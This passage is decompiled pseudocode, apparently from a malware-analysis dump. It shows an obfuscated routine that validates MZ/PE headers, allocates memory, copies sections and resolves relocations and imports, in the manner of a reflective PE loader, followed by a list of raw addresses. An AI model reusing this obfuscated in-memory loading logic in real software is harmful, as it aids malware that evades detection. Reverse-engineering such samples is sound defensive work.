                                                                                                                					_t19 = (_t641 * _t1034 * _t1019 - 4) * _t1034 - (_t724 * _t1019 + _t17) *  *0x1006c2cc - _t641 * _t641 * _t1019 +  *0x1006c2c4 + 0x5a4d; // 0x5a4d
                                                                                                                					_t396 =  *(_t1227 + 0x58);
                                                                                                                					if(( *_t396 & 0x0000ffff) != _t1114 * _t1019 + _t19) {
                                                                                                                						goto L21;
                                                                                                                					} else {
                                                                                                                						 *(_t1227 + 0x20) = _t396[0x1e];
                                                                                                                						 *(_t1227 + 0x18) = _t1034 * _t1114;
                                                                                                                						_t25 = _t1114 + 1; // 0x1
                                                                                                                						_t402 =  *0x1006c2cc; // 0x0
                                                                                                                						_t869 =  *0x1006c2cc; // 0x0
                                                                                                                						_t1115 = _t1114 *  *0x1006c2c4;
                                                                                                                						 *(_t1227 + 0x20) = ( *(_t1227 + 0x18) * _t1114 - _t641 - _t869 + 2) * _t869 - _t1034 * _t1034 + _t1019;
                                                                                                                						_t36 = _t1115 * 4; // -5
                                                                                                                						_t416 = E10006690(((_t641 * _t1019 * 4 - 4) *  *0x1006c2c4 + _t402 + _t402 + _t402 + _t402) *  *0x1006c2c4 + (0x1f - _t1019 -  *0x1006c2cc + 0x1f - _t1019 -  *0x1006c2cc - (_t1019 + _t25) * _t1034) * 4 - _t641 * 4 +  *(_t1227 + 0x20), (_t1114 *  *0x1006c2c4 + _t36 - 5) * _t641 + ( *(_t1227 + 0x18) * _t1114 - _t641 - _t869 + 2) * _t869 - _t1034 * _t1034 + _t1019 +  *((intOrPtr*)(_t1227 + 0x5c)) +  *(_t1227 + 0x20) * 4);
                                                                                                                						_t1228 = _t1227 + 4;
                                                                                                                						if(_t416 == 0) {
                                                                                                                							goto L21;
                                                                                                                						} else {
                                                                                                                							_t739 =  *0x1006c2c4; // 0x0
                                                                                                                							_t418 = _t739 * _t739;
                                                                                                                							 *(_t1228 + 0x14) = _t418;
                                                                                                                							_t419 =  *0x1006c2cc; // 0x0
                                                                                                                							 *((intOrPtr*)(_t1228 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t1228 + 0x58)) + 0x3c)) + (_t418 - _t1019 + _t419) * 4 +  *((intOrPtr*)(_t1228 + 0x58));
                                                                                                                							_t880 =  *0x1006c2bc; // 0x0
                                                                                                                							if( *((intOrPtr*)( *((intOrPtr*)(_t1228 + 0x10)))) != 0x4550 + ((_t1034 + _t880) * _t1034 + (_t880 + 1) * _t419 - _t641 + _t739 + _t1019) * 4) {
                                                                                                                								goto L21;
                                                                                                                							} else {
                                                                                                                								_t53 = _t1034 - 2; // -2
                                                                                                                								_t422 =  *((intOrPtr*)(_t1228 + 0x10));
                                                                                                                								if(( *(_t422 + 4) & 0x0000ffff) != (4 + _t739 * 4) *  *0x1006c2bc + 0x14c + (_t53 * _t419 - (_t419 + 3) * _t1019 + _t641 + _t1034 + _t739) * 4) {
                                                                                                                									goto L21;
                                                                                                                								} else {
                                                                                                                									_t888 =  *0x1006c2cc; // 0x0
                                                                                                                									 *(_t1228 + 0x20) =  *(_t422 + 0x38);
                                                                                                                									_t67 = (_t641 + _t739 + _t888) * 4; // 0x1
                                                                                                                									if(( *(_t1228 + 0x20) & (_t888 * 0x00000004 - 0x00000004) * _t1034 + _t67 + 0x00000001) != 0) {
                                                                                                                										goto L21;
                                                                                                                									} else {
                                                                                                                										_t73 = _t1034 - 1; // -1
                                                                                                                										_t74 = _t1019 - 4; // -4
                                                                                                                										_t434 =  *((intOrPtr*)(_t1228 + 0x10));
                                                                                                                										 *((intOrPtr*)(_t1228 + 0x28)) = (((_t739 + _t1019) *  *0x1006c2bc - 2) * _t641 + _t73 * _t1034 + _t74 * _t888 - _t739 + (((_t739 + _t1019) *  *0x1006c2bc - 2) * _t641 + _t73 * _t1034 + _t74 * _t888 - _t739) * 4 << 4) + _t434 + ( *(_t434 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                										_t895 = ( *(_t434 + 6) & 0x0000ffff) + ( *(_t1228 + 0x14) + _t1034 * 2) * 2;
                                                                                                                										if(_t895 <= 0) {
                                                                                                                											_t1141 =  *((intOrPtr*)(_t1228 + 0x24));
                                                                                                                										} else {
                                                                                                                											_t613 =  *0x1006c2bc; // 0x0
                                                                                                                											_t90 = _t1034 + 8; // 0x8
                                                                                                                											 *((intOrPtr*)(_t1228 + 0x1c)) = _t895;
                                                                                                                											_t1141 =  *((intOrPtr*)(_t1228 + 0x24));
                                                                                                                											 *((intOrPtr*)(_t1228 + 0x2c)) = (_t613 -  *((intOrPtr*)(_t1228 + 0x1c)) + 2) * _t739 -  *(_t1228 + 0x18) - _t1019 -  *0x1006c2cc + (_t613 -  *((intOrPtr*)(_t1228 + 0x1c)) + 2) * _t739 -  *(_t1228 + 0x18) - _t1019 -  *0x1006c2cc - (_t1034 + _t90) * _t641;
                                                                                                                											 *(_t1228 + 0x14) =  *((intOrPtr*)(_t1228 + 0x28)) + 0xc;
                                                                                                                											do {
                                                                                                                												if( *((intOrPtr*)( *(_t1228 + 0x14) + 4)) != 0) {
                                                                                                                													_t628 =  *((intOrPtr*)( *(_t1228 + 0x14) + 4)) + (_t1019 * _t1019 * _t1019 - _t1034 + _t1034) * 4 +  *( *(_t1228 + 0x14));
                                                                                                                												} else {
                                                                                                                													_t628 = ( ~( *(_t1228 + 0x18)) +  ~( *(_t1228 + 0x18)) +  ~( *(_t1228 + 0x18)) +  ~( *(_t1228 + 0x18)) - (4 + _t739 * 4) * _t1019 + 8) *  *0x1006c2cc + (4 + _t739 * 4) * _t1034 - _t1019 * 8 - _t641 * 4 +  *( *(_t1228 + 0x14)) +  *(_t1228 + 0x20);
                                                                                                                												}
                                                                                                                												if(_t628 >  *((intOrPtr*)(_t1228 + 0x2c)) + _t1141) {
                                                                                                                													_t1218 =  *0x1006c2cc; // 0x0
                                                                                                                													_t739 =  *0x1006c2c4; // 0x0
                                                                                                                													_t1141 = (_t1218 - (_t1034 * _t739 + 1) * _t739 - _t641 - 1) * _t739 + (2 -  *(_t1228 + 0x18)) *  *0x1006c2bc - _t641 + _t641 - _t1019 + _t628;
                                                                                                                												}
                                                                                                                												 *(_t1228 + 0x14) =  *(_t1228 + 0x14) + 0x28;
                                                                                                                												_t119 = _t1228 + 0x1c;
                                                                                                                												 *_t119 =  *((intOrPtr*)(_t1228 + 0x1c)) - 1;
                                                                                                                											} while ( *_t119 != 0);
                                                                                                                										}
                                                                                                                										_t436 =  *0x1006c2cc; // 0x0
                                                                                                                										_t122 = _t436 + 1; // 0x1
                                                                                                                										 *0x1006f020(_t1228 + 0x30 + (_t122 * _t1019 + (_t641 *  *0x1006c2bc - _t1034 * _t739 * _t1019 - 1) * _t739 + _t436) * 0xb4);
                                                                                                                										_t438 =  *0x1006c2cc; // 0x0
                                                                                                                										_t1037 =  *0x1006c2c8; // 0x0
                                                                                                                										_t744 =  *0x1006c2c4; // 0x0
                                                                                                                										 *(_t1228 + 0x18) = _t438 + _t438 * 4;
                                                                                                                										_t1020 =  *0x1006c2c0; // 0x0
                                                                                                                										_t130 = _t438 + 2; // 0x2
                                                                                                                										_t904 =  *0x1006c2d0; // 0x0
                                                                                                                										_t653 =  *0x1006c2bc; // 0x0
                                                                                                                										_t446 = E10006650((_t438 + _t130) *  *0x1006c2bc +  *((intOrPtr*)(_t1228 + 0x34)) + (_t744 + _t744 - _t1037 * _t438 -  *0x1006c2d0 + _t1020) * 2, (( *(_t1228 + 0x18) - _t1020 + _t1020 * 4) *  *0x1006c2bc -  *(_t1228 + 0x18) - 5) * _t438 + _t1020 * _t1020 - _t904 + _t904 + _t1037 + _t653 + (_t1020 * _t1020 - _t904 + _t904 + _t1037 + _t653) * 4 +  *((intOrPtr*)( *((intOrPtr*)(_t1228 + 0x10)) + 0x50)));
                                                                                                                										_t750 =  *0x1006c2d0; // 0x0
                                                                                                                										 *(_t1228 + 0x20) = _t446 - _t750 + _t1020 + _t750 + _t1020 + _t750 + _t1020 + _t750 + _t1020;
                                                                                                                										_t448 =  *0x1006c2cc; // 0x0
                                                                                                                										_t449 =  *0x1006c2c4; // 0x0
                                                                                                                										_t452 = E10006650( *((intOrPtr*)(_t1228 + 0x38)) + _t448 * 2, _t449 + _t449 + _t1141);
                                                                                                                										_t1229 = _t1228 + 8;
                                                                                                                										if( *((intOrPtr*)(_t1229 + 0x1c)) != _t452) {
                                                                                                                											goto L21;
                                                                                                                										} else {
                                                                                                                											_t910 =  *0x1006c2c4; // 0x0
                                                                                                                											_t1142 =  *0x1006c2d0; // 0x0
                                                                                                                											_t755 = _t653 + _t910;
                                                                                                                											_t916 =  *0x1006c2cc; // 0x0
                                                                                                                											_t155 = (_t755 - _t916) * 4; // 0x8
                                                                                                                											_t466 =  *0x1006c2c4; // 0x0
                                                                                                                											_t163 = _t1037 * 4; // 0x5
                                                                                                                											_t475 =  *0x1006c2d0; // 0x0
                                                                                                                											_t169 = _t653 + 1; // 0x1
                                                                                                                											_t170 = _t475 - 2; // -2
                                                                                                                											_t1042 =  *((intOrPtr*)(_t1229 + 0x74))(((4 - _t1037 * _t653 *  *0x1006c2c4 + _t1037 * _t653 *  *0x1006c2c4 + _t1037 * _t653 *  *0x1006c2c4 + _t1037 * _t653 *  *0x1006c2c4) * _t653 + 4) * _t475 + (_t169 * _t1020 + _t170 * _t916 - _t1037) * 4 +  *((intOrPtr*)( *((intOrPtr*)(_t1229 + 0x20)) + 0x34)),  *((intOrPtr*)(_t1229 + 0x28)), ((0x00000004 - _t1020 * 0x00000008) * _t1037 + _t155 + 0x00000004) * _t916 + 0x00001000 + (_t653 * _t1020 - _t1142 + _t466) * 0x00000004 + (_t653 * _t466 * 0x00000004 - 0x00000004) * _t1037 | (_t1037 + _t163 + 0x00000005 -  *((intOrPtr*)(_t1229 + 0x20))) *  *0x1006c2d0 - _t653 * _t916 + _t1037 + _t1020 + (_t653 * _t916 + _t1037 + _t1020) * 0x00000004 + 0x00002000, (1 - _t910) * _t1037 + _t755 * _t1020 - _t1142 + _t1142 * 2 + _t1142 + _t1142 * 2 + 6,  *((intOrPtr*)(_t1229 + 0x74)));
                                                                                                                											_t1230 = _t1229 + 0x14;
                                                                                                                											 *((intOrPtr*)(_t1230 + 0x14)) = _t1042;
                                                                                                                											if(_t1042 != 0) {
                                                                                                                												L19:
                                                                                                                												_t1023 =  *0x1006c2c8; // 0x0
                                                                                                                												_t479 =  *0x1006c2c4; // 0x0
                                                                                                                												_t768 =  *0x1006c2c0; // 0x0
                                                                                                                												_t1152 =  *0x1006c2bc; // 0x0
                                                                                                                												_t924 =  *0x1006c2cc; // 0x0
                                                                                                                												_t198 = _t1152 + 1; // 0x1
                                                                                                                												_t199 = _t1023 - 1; // -1
                                                                                                                												_t660 =  *0x1006c2d0; // 0x0
                                                                                                                												_t771 = (_t768 + 1) *  *0x1006c2bc + _t479 * _t768 * _t924 - (_t924 + 3) * _t660 + _t1023;
                                                                                                                												_t203 = (_t768 + 1) *  *0x1006c2bc + _t479 * _t768 * _t924 - (_t924 + 3) * _t660 + _t1023 + _t771 * 2 + 8; // 0x8
                                                                                                                												_t486 = HeapAlloc(GetProcessHeap(), (_t768 + 1) *  *0x1006c2bc + _t479 * _t768 * _t924 - (_t924 + 3) * _t660 + _t1023 + _t771 * 2 + _t203, ((_t768 - _t1023 * _t479) * _t768 - _t924 + _t198) * _t924 + _t199 * _t479 - _t660 + 0x40);
                                                                                                                												_t927 =  *0x1006c2c0; // 0x0
                                                                                                                												_t487 =  *0x1006c2c8; // 0x0
                                                                                                                												_t204 = _t487 + 1; // 0x1
                                                                                                                												_t775 =  *0x1006c2c4; // 0x0
                                                                                                                												_t928 =  *0x1006c2d0; // 0x0
                                                                                                                												_t1025 = _t486 + (((_t775 + _t927) *  *0x1006c2bc + 3) * _t928 + _t487 + (2 - _t204 * _t927) *  *0x1006c2cc + (_t775 * _t775 -  *0x1006c2c8) * 2 << 7);
                                                                                                                												if(_t1025 != 0) {
                                                                                                                													 *((intOrPtr*)(_t1025 + 4)) = _t1042;
                                                                                                                													_t929 =  *0x1006c2c4; // 0x0
                                                                                                                													_t1043 =  *((intOrPtr*)(_t1230 + 0x10));
                                                                                                                													_t930 =  *0x1006c2cc; // 0x0
                                                                                                                													_t494 =  *0x1006c2c8; // 0x0
                                                                                                                													asm("sbb ecx, ecx");
                                                                                                                													 *((intOrPtr*)(_t1025 + 0x1c)) =  *((intOrPtr*)(_t1230 + 0x60));
                                                                                                                													 *((intOrPtr*)(_t1025 + 0x24)) =  *((intOrPtr*)(_t1230 + 0x68));
                                                                                                                													 *(_t1025 + 0x14) =  ~( ~((0x00000002 - _t929 + _t929) *  *0x1006c2d0 + 0x00002000 + (_t494 + _t930) * 0x00000002 &  *(_t1043 + 0x16) & 0x0000ffff));
                                                                                                                													 *((intOrPtr*)(_t1025 + 0x20)) =  *((intOrPtr*)(_t1230 + 0x64));
                                                                                                                													 *((intOrPtr*)(_t1025 + 0x2c)) =  *((intOrPtr*)(_t1230 + 0x70));
                                                                                                                													 *((intOrPtr*)(_t1025 + 0x28)) =  *((intOrPtr*)(_t1230 + 0x6c));
                                                                                                                													 *((intOrPtr*)(_t1025 + 0x34)) =  *((intOrPtr*)(_t1230 + 0x74));
                                                                                                                													_t934 =  *0x1006c2c0; // 0x0
                                                                                                                													_t664 =  *0x1006c2c8; // 0x0
                                                                                                                													_t785 =  *0x1006c2bc; // 0x0
                                                                                                                													 *((intOrPtr*)(_t1025 + 0x3c)) = (_t785 *  *0x1006c2c4 + _t934 + (_t785 *  *0x1006c2c4 + _t934) * 2 - 3) *  *0x1006c2cc +  *((intOrPtr*)(_t1230 + 0x34)) + _t934 - (_t664 * _t934 + 2) *  *0x1006c2d0 - _t785 *  *0x1006c2c4 + (_t934 - (_t664 * _t934 + 2) *  *0x1006c2d0 - _t785 *  *0x1006c2c4) * 2;
                                                                                                                													_t1044 =  *0x1006c2bc; // 0x0
                                                                                                                													_t936 =  *0x1006c2c0; // 0x0
                                                                                                                													_t670 =  *0x1006c2cc; // 0x0
                                                                                                                													_t247 = _t670 + 1; // 0x1
                                                                                                                													_t1166 =  *0x1006c2c4; // 0x0
                                                                                                                													 *((intOrPtr*)(_t1230 + 0x28)) =  *((intOrPtr*)(_t1043 + 0x54));
                                                                                                                													_t251 = _t1044 + 2; // 0x2
                                                                                                                													 *(_t1230 + 0x2c) = _t251 *  *0x1006c2d0 - (_t936 + 1) * _t670;
                                                                                                                													_t507 = E10006690( *((intOrPtr*)(_t1043 + 0x54)) + ((_t1044 * _t1044 + _t936 - 1) *  *0x1006c2d0 + _t247 * _t936 - _t1166 + _t1166 - _t670) * 4, (_t1044 + _t1044 * 2 + _t1044 + _t1044 * 2 + 3) *  *0x1006c2c4 + _t251 *  *0x1006c2d0 - (_t936 + 1) * _t670 +  *((intOrPtr*)(_t1230 + 0x5c)) + (_t251 *  *0x1006c2d0 - (_t936 + 1) * _t670) * 2);
                                                                                                                													_t1231 = _t1230 + 4;
                                                                                                                													if(_t507 == 0) {
                                                                                                                														L30:
                                                                                                                														E100088F0(_t1025);
                                                                                                                														return 0;
                                                                                                                													} else {
                                                                                                                														_t261 = _t670 - 3; // -3
                                                                                                                														_t512 =  *0x1006c2d0; // 0x0
                                                                                                                														_t800 =  *0x1006c2c8; // 0x0
                                                                                                                														_t953 =  *0x1006c2c0; // 0x0
                                                                                                                														_t1175 =  *0x1006c2c4; // 0x0
                                                                                                                														_t268 = _t512 + 1; // 0x1
                                                                                                                														_t516 =  *((intOrPtr*)(_t1231 + 0x74))( *((intOrPtr*)(_t1231 + 0x20)),  *((intOrPtr*)(_t1231 + 0x34)) + ((_t1175 * _t670 - _t800 - _t953 + _t268) * _t670 - _t512 * _t1175 - _t800 + _t800 * 2) * 4, _t1044 * _t953 + (_t1044 - _t800 * _t512 - _t953 - 1) * _t670 + _t512 + _t1175 + _t1175 + _t953 + 0x1000, (2 - _t670) *  *0x1006c2c4 + _t261 *  *0x1006c2c0 + 4 + _t800 * 2 - _t670 + _t1044,  *((intOrPtr*)(_t1231 + 0x74)));
                                                                                                                														_t802 =  *0x1006c2c0; // 0x0
                                                                                                                														_t1054 = _t516;
                                                                                                                														_t517 =  *0x1006c2bc; // 0x0
                                                                                                                														_t276 = _t517 + 3; // 0x3
                                                                                                                														_t964 =  *0x1006c2c4; // 0x0
                                                                                                                														_t282 = _t802 - 2; // -2
                                                                                                                														 *(_t1231 + 0x40) = _t1054;
                                                                                                                														memcpy(_t1054,  *(_t1231 + 0x70), (_t517 * _t964 + _t517 * _t964 - 2) * _t964 + (_t276 *  *0x1006c2d0 + (_t802 - _t517 + 3) *  *0x1006c2cc + _t802) * 2 + (_t802 + _t282) *  *0x1006c2c8 +  *((intOrPtr*)( *((intOrPtr*)(_t1231 + 0x24)) + 0x54)));
                                                                                                                														_t524 =  *0x1006c2bc; // 0x0
                                                                                                                														_t969 =  *0x1006c2c0; // 0x0
                                                                                                                														_t804 =  *0x1006c2cc; // 0x0
                                                                                                                														_t288 = _t804 * 4; // 0x5cb
                                                                                                                														_t1063 =  *0x1006c2d0; // 0x0
                                                                                                                														_t527 = (_t969 * _t969 + (_t524 - _t969 + _t804) * _t524 +  *0x1006c2c8 +  *0x1006c2d0) * 0x2e8 - (_t804 + _t288 + 0x5cb) *  *0x1006c2c4 + (0xb9b - _t524 + _t524 * 4) * _t1063 + (0x2e8 - _t1063 + _t1063 * 4) * _t969 - _t804 * 0x5cb + _t524 * 0x2ed +  *((intOrPtr*)( *((intOrPtr*)(_t1231 + 0x78)) + 0x3c)) +  *((intOrPtr*)(_t1231 + 0x4c));
                                                                                                                														 *_t1025 = _t527;
                                                                                                                														_t807 =  *0x1006c2cc; // 0x0
                                                                                                                														_t808 =  *0x1006c2c0; // 0x0
                                                                                                                														_t972 =  *0x1006c2bc; // 0x0
                                                                                                                														 *((intOrPtr*)(_t527 + 0x34)) =  *((intOrPtr*)(_t1231 + 0x34)) + ((1 - _t807 * _t807 - _t808) *  *0x1006c2c4 - (_t972 + 1) *  *0x1006c2c8 + _t808 * 2) * 2;
                                                                                                                														_t976 =  *0x1006c2d0; // 0x0
                                                                                                                														_t1182 =  *0x1006c2cc; // 0x0
                                                                                                                														_t687 =  *0x1006c2bc; // 0x0
                                                                                                                														_t977 =  *0x1006c2c0; // 0x0
                                                                                                                														_t1070 =  *0x1006c2c8; // 0x0
                                                                                                                														_t528 =  *0x1006c2c4; // 0x0
                                                                                                                														_t693 =  *0x1006c2cc; // 0x0
                                                                                                                														_push((_t977 + _t528 * 2 + _t528 + (_t1182 - _t976 *  *0x1006c2bc) * _t976 - ((_t687 *  *0x1006c2cc + 1) * _t977 + 1) * _t1070 + _t693 * 2 << 8) + _t1025);
                                                                                                                														_push( *((intOrPtr*)(_t1231 + 0x34)));
                                                                                                                														_t1078 =  *0x1006c2bc; // 0x0
                                                                                                                														_t1079 =  *0x1006c2d0; // 0x0
                                                                                                                														_push( *((intOrPtr*)(_t1231 + 0x84)) + 4 + (2 - (_t1079 * _t528 * _t977 + 1) *  *0x1006c2c8) * _t1079 + (_t1070 * _t528 * _t977 - _t1078 * _t1078 + 1) *  *0x1006c2cc + _t1070 * _t528 + _t977);
                                                                                                                														_push( *((intOrPtr*)(_t1231 + 0x80)));
                                                                                                                														_t534 = E100066C0();
                                                                                                                														_t1231 = _t1231 + 0x30;
                                                                                                                														if(_t534 == 0) {
                                                                                                                															goto L30;
                                                                                                                														} else {
                                                                                                                															_t700 =  *0x1006c2cc; // 0x0
                                                                                                                															_t535 =  *0x1006c2c0; // 0x0
                                                                                                                															_t815 =  *0x1006c2c4; // 0x0
                                                                                                                															_t980 =  *0x1006c2d0; // 0x0
                                                                                                                															_t314 = _t535 * 2; // 0x1
                                                                                                                															_t536 =  *0x1006c2bc; // 0x0
                                                                                                                															_t316 = _t536 + 2; // 0x2
                                                                                                                															_t1087 = (_t700 + _t314 + 1) * _t815 + _t316 * _t980 - _t700 +  *0x1006c2c0 + ((_t700 + _t314 + 1) * _t815 + _t316 * _t980 - _t700 +  *0x1006c2c0) * 4 +  *((intOrPtr*)( *_t1025 + 0x34)) -  *((intOrPtr*)( *((intOrPtr*)(_t1231 + 0x10)) + 0x34));
                                                                                                                															 *((intOrPtr*)(_t1231 + 0x2c)) = _t1087;
                                                                                                                															if(_t1087 == 0) {
                                                                                                                																 *((intOrPtr*)(_t1025 + 0x18)) = 1;
                                                                                                                															} else {
                                                                                                                																_t323 = _t980 + 2; // 0x2
                                                                                                                																 *((intOrPtr*)(_t1231 + 0x5c)) = _t323;
                                                                                                                																_t1102 =  *0x1006c2c0; // 0x0
                                                                                                                																_push( *((intOrPtr*)(_t1231 + 0x2c)) + ((_t536 + _t536 - _t980 * _t815 +  *0x1006c2c8 + _t700) * _t815 - (_t700 +  *((intOrPtr*)(_t1231 + 0x5c))) * _t1102 - _t980 -  *0x1006c2cc + _t536) * 4);
                                                                                                                																_t710 =  *0x1006c2c8; // 0x0
                                                                                                                																_push((((_t536 * _t815 - 1) * _t710 + _t980 * _t1102 - _t815) * _t1102 + (_t815 - _t980 + 1) *  *0x1006c2cc -  *(_t1231 + 0x60) * _t710 + _t980 + _t815 * 2 << 7) + _t1025);
                                                                                                                																_t585 = E100076D0();
                                                                                                                																_t833 =  *0x1006c2d0; // 0x0
                                                                                                                																_t992 =  *0x1006c2c4; // 0x0
                                                                                                                																_t993 =  *0x1006c2c0; // 0x0
                                                                                                                																_t1231 = _t1231 + 8;
                                                                                                                																 *((intOrPtr*)(_t1025 + 0x18)) = _t585 + (_t833 * _t992 - (_t833 *  *0x1006c2cc + _t992 + 1) *  *0x1006c2c8 - _t993 + _t993) * 4;
                                                                                                                															}
                                                                                                                															_t816 =  *0x1006c2cc; // 0x0
                                                                                                                															_t981 =  *0x1006c2d0; // 0x0
                                                                                                                															_t1088 =  *0x1006c2c8; // 0x0
                                                                                                                															_t537 =  *0x1006c2c0; // 0x0
                                                                                                                															_push((((_t816 - _t981) * _t1088 + _t537 + 1) *  *0x1006c2c4 + (_t537 * _t816 + _t1088) * 2 - _t537 + _t981 << 8) + _t1025);
                                                                                                                															_t538 = E10007AE0();
                                                                                                                															_t1231 = _t1231 + 4;
                                                                                                                															if(_t538 == 0) {
                                                                                                                																goto L30;
                                                                                                                															} else {
                                                                                                                																_t822 =  *0x1006c2c8; // 0x0
                                                                                                                																_t982 =  *0x1006c2bc; // 0x0
                                                                                                                																_t539 =  *0x1006c2c0; // 0x0
                                                                                                                																_t344 = _t539 + 2; // 0x2
                                                                                                                																_t984 =  *0x1006c2c4; // 0x0
                                                                                                                																_t985 =  *0x1006c2cc; // 0x0
                                                                                                                																_t345 = _t985 + 3; // 0x3
                                                                                                                																_push(((_t539 - _t984 - 1) * _t984 - (_t982 + _t822 + _t344) *  *0x1006c2d0 - _t345 * _t985 + _t822 * 2 + ((_t539 - _t984 - 1) * _t984 - (_t982 + _t822 + _t344) *  *0x1006c2d0 - _t345 * _t985 + _t822 * 2) * 2 << 6) + _t1025);
                                                                                                                																_t549 = E10007030();
                                                                                                                																_t1231 = _t1231 + 4;
                                                                                                                																if(_t549 == 0) {
                                                                                                                																	goto L30;
                                                                                                                																} else {
                                                                                                                																	_t823 =  *0x1006c2cc; // 0x0
                                                                                                                																	_t986 =  *0x1006c2c4; // 0x0
                                                                                                                																	_t1093 =  *0x1006c2c0; // 0x0
                                                                                                                																	_t352 = _t986 + 2; // 0x2
                                                                                                                																	_t824 =  *0x1006c2c8; // 0x0
                                                                                                                																	_t558 = E100075D0(((_t823 * _t823 + _t986 + _t1093 + 1) * _t1093 - _t352 * _t823 + (_t824 + 1) *  *0x1006c2bc - _t986 + ((_t823 * _t823 + _t986 + _t1093 + 1) * _t1093 - _t352 * _t823 + (_t824 + 1) *  *0x1006c2bc - _t986) * 2 << 6) + _t1025);
                                                                                                                																	_t1231 = _t1231 + 4;
                                                                                                                																	if(_t558 != 0) {
                                                                                                                																		_t827 =  *((intOrPtr*)( *_t1025 + 0x28));
                                                                                                                																		if(_t827 == 0) {
                                                                                                                																			 *((intOrPtr*)(_t1025 + 0x38)) = 0;
                                                                                                                																			return _t1025;
                                                                                                                																		} else {
                                                                                                                																			_t990 =  *0x1006c2c0; // 0x0
                                                                                                                																			if( *(_t1025 + 0x14) == 0) {
                                                                                                                																				_t561 =  *0x1006c2bc; // 0x0
                                                                                                                																				_t364 = _t561 * _t561 * _t990 *  *0x1006c2cc * 2; // 0x3
                                                                                                                																				_t366 = _t990 + 3; // 0x3
                                                                                                                																				 *((intOrPtr*)(_t1025 + 0x38)) = _t366 *  *0x1006c2c4 -  *0x1006c2c8 + (_t366 *  *0x1006c2c4 -  *0x1006c2c8) * 2 - (_t561 * _t561 * _t990 *  *0x1006c2cc + _t364 + 3) *  *0x1006c2d0 + _t827 +  *((intOrPtr*)(_t1231 + 0x14));
                                                                                                                																				return _t1025;
                                                                                                                																			} else {
                                                                                                                																				_t573 =  *0x1006c2c8; // 0x0
                                                                                                                																				 *0x1006f040 = _t827 - _t990 + _t573 * 2 + (_t990 + _t573 * 2) * 4 +  *((intOrPtr*)(_t1231 + 0x14));
                                                                                                                																				 *((intOrPtr*)(_t1025 + 0x10)) = 1;
                                                                                                                																				return _t1025;
                                                                                                                																			}
                                                                                                                																		}
                                                                                                                																	} else {
                                                                                                                																		goto L30;
                                                                                                                																	}
                                                                                                                																}
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												} else {
                                                                                                                													_t1026 =  *0x1006c2c0; // 0x0
                                                                                                                													_t711 =  *0x1006c2cc; // 0x0
                                                                                                                													 *((intOrPtr*)(_t1230 + 0x74))(_t1042, 0, _t928 - _t775 + (_t928 - _t775) * 2 - ((_t928 *  *0x1006c2bc * _t775 * _t1026 + 1) * _t711 * _t711 + (_t928 *  *0x1006c2bc * _t775 * _t1026 + 1) * _t711 * _t711 * 2 + (_t928 * _t1026 * _t1026 + 3 + _t928 * _t1026 * _t1026 * 2) * _t775) *  *0x1006c2c8 + 0x8000,  *((intOrPtr*)(_t1230 + 0x74)));
                                                                                                                													goto L21;
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t1113 =  *0x1006c2cc; // 0x0
                                                                                                                												_t601 =  *0x1006c2bc; // 0x0
                                                                                                                												_t178 = _t1113 + 1; // 0x1
                                                                                                                												_t997 =  *0x1006c2c0; // 0x0
                                                                                                                												_t843 =  *0x1006c2d0; // 0x0
                                                                                                                												_t1032 =  *0x1006c2c8; // 0x0
                                                                                                                												_t191 = _t843 + 1; // 0x1
                                                                                                                												_t612 =  *((intOrPtr*)(_t1230 + 0x74))(0,  *((intOrPtr*)(_t1230 + 0x28)) + (_t843 - (_t191 * _t997 + 2) * _t1113 +  *0x1006c2c4) * 2, _t601 * _t997 * _t997 - _t1032 * _t1113 + 0x00002000 + (_t601 * _t997 * _t997 - _t1032 * _t1113) * 0x00000002 | 0x00001000 - _t1032 + _t1032 * 0x00000004, (4 + _t997 * 4 - _t601 * 4) * _t843 + _t601 * 4 + (_t178 *  *0x1006c2c4 * 4 - 4) * _t1113 + (1 -  *0x1006c2c8 - _t997) * 4,  *((intOrPtr*)(_t1230 + 0x74)));
                                                                                                                												_t1042 = _t612;
                                                                                                                												_t1230 = _t1230 + 0x14;
                                                                                                                												 *((intOrPtr*)(_t1230 + 0x14)) = _t612;
                                                                                                                												if(_t1042 == 0) {
                                                                                                                													goto L21;
                                                                                                                												} else {
                                                                                                                													goto L19;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}
                                                                                                                0x10009036
                                                                                                                0x00000000
                                                                                                                0x1000903c
                                                                                                                0x1000904c
                                                                                                                0x10009054
                                                                                                                0x10009061
                                                                                                                0x10009076
                                                                                                                0x10009081
                                                                                                                0x10009086
                                                                                                                0x1000919b
                                                                                                                0x1000908c
                                                                                                                0x1000908c
                                                                                                                0x10009095
                                                                                                                0x100090a6
                                                                                                                0x100090b6
                                                                                                                0x100090ba
                                                                                                                0x100090c5
                                                                                                                0x100090d0
                                                                                                                0x100090d8
                                                                                                                0x10009141
                                                                                                                0x100090da
                                                                                                                0x10009120
                                                                                                                0x10009120
                                                                                                                0x1000914b
                                                                                                                0x1000914d
                                                                                                                0x1000917d
                                                                                                                0x10009187
                                                                                                                0x10009187
                                                                                                                0x10009189
                                                                                                                0x1000918e
                                                                                                                0x1000918e
                                                                                                                0x1000918e
                                                                                                                0x10009199
                                                                                                                0x100091a9
                                                                                                                0x100091b9
                                                                                                                0x100091ce
                                                                                                                0x100091d4
                                                                                                                0x100091d9
                                                                                                                0x100091df
                                                                                                                0x100091e8
                                                                                                                0x100091ec
                                                                                                                0x10009205
                                                                                                                0x10009229
                                                                                                                0x10009242
                                                                                                                0x10009257
                                                                                                                0x1000925c
                                                                                                                0x1000926e
                                                                                                                0x10009272
                                                                                                                0x1000927a
                                                                                                                0x10009284
                                                                                                                0x10009289
                                                                                                                0x10009290
                                                                                                                0x00000000
                                                                                                                0x10009296
                                                                                                                0x10009296
                                                                                                                0x100092a1
                                                                                                                0x100092a7
                                                                                                                0x100092d6
                                                                                                                0x100092e1
                                                                                                                0x100092f1
                                                                                                                0x10009310
                                                                                                                0x1000932f
                                                                                                                0x10009342
                                                                                                                0x10009348
                                                                                                                0x1000937f
                                                                                                                0x10009381
                                                                                                                0x10009386
                                                                                                                0x1000938a
                                                                                                                0x10009445
                                                                                                                0x10009445
                                                                                                                0x1000944b
                                                                                                                0x10009450
                                                                                                                0x10009456
                                                                                                                0x10009465
                                                                                                                0x10009470
                                                                                                                0x10009477
